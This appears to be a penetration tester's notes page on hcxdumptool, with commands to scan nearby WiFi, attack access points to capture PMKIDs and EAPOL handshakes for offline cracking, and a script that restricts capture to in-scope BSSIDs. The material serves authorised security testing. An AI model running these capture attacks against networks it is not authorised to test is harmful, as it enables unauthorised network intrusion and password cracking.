# hcxdumptool

This [tool](https://github.com/ZerBea/hcxdumptool/) is awesome for wifi shenanigans.
:::info
For now I'm just dumping notes I gathered from a recent engagement where I needed to use this tool to capture/extract/crack PMKIDs.
:::

## Install

```
git clone https://github.com/ZerBea/hcxdumptool.git ~/hcxdumptool
cd ~/hcxdumptool
sudo apt install build-essential git libpcap-dev -y
make -j $(nproc)
```

## Enumerate nearby wifi
```
sudo hcxdumptool -i wlan0mon -F --rcascan=active
```

## Attack just specific channels
```
sudo hcxdumptool -i wlan0mon -F --rds=1 -c40b,44b -w dump.pcapng
```

## Basic run to start enumerating/attacking all the wifis
*Taking these tips from [this issue](https://github.com/ZerBea/hcxdumptool/issues/355).  [This Cyberark blog](https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick) was also very helpful.*

```
sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F
```

:::tip
Don't put the interface in monitor mode first!
:::

## Build a filter list
*Check out [this issue](https://github.com/ZerBea/hcxdumptool/issues/301#issuecomment-1594707335) for a good example.  Also check out [this discussion](https://github.com/ZerBea/hcxdumptool/discussions/485).*
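To keep the capture limited to the APs authorised for the engagement, here is an added example (my own, not from hcxdumptool or the linked threads) that turns a scope list into the tcpdump filter expression hcxdumptool's `--bpf` consumes once compiled with `tcpdump -ddd`. The input file format (one BSSID per line, any separator, `#` comments) and the `IFACE` variable are my assumptions.

```shell
#!/bin/sh
# Added example, not part of the hcxdumptool project: build the tcpdump filter
# expression for a BPF that restricts hcxdumptool to in-scope BSSIDs only, so
# the capture never touches networks outside the authorisation list.
# Input format is an assumption: one BSSID per line, any separator, '#' comments.

# build_bpf_expr FILE -> prints "wlan addr3 <bssid> or wlan addr3 <bssid> ..."
build_bpf_expr() {
    expr=""
    while IFS= read -r line || [ -n "$line" ]; do
        # drop comments, separators and whitespace, normalise to lowercase
        mac=$(printf '%s' "$line" | sed 's/#.*//; s/[-:[:space:]]//g' \
              | tr '[:upper:]' '[:lower:]')
        [ -z "$mac" ] && continue
        # reject anything that is not exactly 12 hex digits
        case "$mac" in *[!0-9a-f]*) mac="" ;; esac
        if [ -z "$mac" ] || [ ${#mac} -ne 12 ]; then
            echo "skipping invalid BSSID: $line" >&2
            continue
        fi
        mac=$(printf '%s' "$mac" | sed 's/../&:/g; s/:$//')   # -> xx:xx:xx:xx:xx:xx
        if [ -z "$expr" ]; then
            expr="wlan addr3 $mac"
        else
            expr="$expr or wlan addr3 $mac"
        fi
    done < "$1"
    printf '%s\n' "$expr"
}

# Constructed sample authorisation list (made-up values, not real networks).
SCOPE_FILE=$(mktemp)
cat > "$SCOPE_FILE" <<'EOF'
# in-scope APs for this engagement
00:11:22:33:44:55   # corp-wifi
AA-BB-CC-DD-EE-FF   # corp-guest
not-a-mac           # typo: rejected and logged on stderr
EOF

# Compile with tcpdump (needs the capture interface) only when one is given:
#   IFACE=wlan0 sh build_bpf.sh
if [ -n "${IFACE:-}" ]; then
    tcpdump -i "$IFACE" -ddd "$(build_bpf_expr "$SCOPE_FILE")" > attack.bpf
fi
```

The resulting `attack.bpf` is what the `--bpf=attack.bpf` runs below point at; anything rejected by the validator is reported on stderr rather than silently dropped.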

## Capture away!

### Capture with BPF
```
hcxdumptool -i NAME-OF-PHYSICAL-WIFI-INTERFACE --bpf=attack.bpf -w output.pcapng --rds=1 -F
```

### Capture with BPF and specific channels
```
hcxdumptool -i NAME-OF-PHYSICAL-WIFI-INTERFACE --bpf=attack.bpf -w output.pcapng --rds=1 -F -c 55,23
```

As the scan runs you'll see a table with this heading:

```
R 1 3 P S
```
- **R** - AP in range or under attack
- **1** - got EAPOL M1 challenge
- **3** - got EAPOL M1M2M3 or EAPOL (hashcat/JTR can work with this)
- **P** - got PMKID (hashcat/JTR can work with this)
- **S** - authentication key management PSK

:::tip
*Better explanation from [this thread](https://github.com/ZerBea/hcxdumptool/issues/301)*

```
real time display:
 R = + AP display:     AP is in TX range or under attack
 S = + AP display:     AUTHENTICATION KEY MANAGEMENT PSK
 P = + AP display:     got PMKID
 1 = + AP display:     got EAPOL M1 (CHALLENGE)
 3 = + AP display:     got EAPOL M1M2M3 (AUTHORIZATION)
 E = + CLIENT display: got EAP-START MESSAGE
 2 = + CLIENT display: got EAPOL M1M2 (ROGUE CHALLENGE)
```
:::

:::warning
WPA3 is attacked differently!  Check the [hcxlabtool](/pentesting/Wifi/hcxlabtool) page for more information.
:::
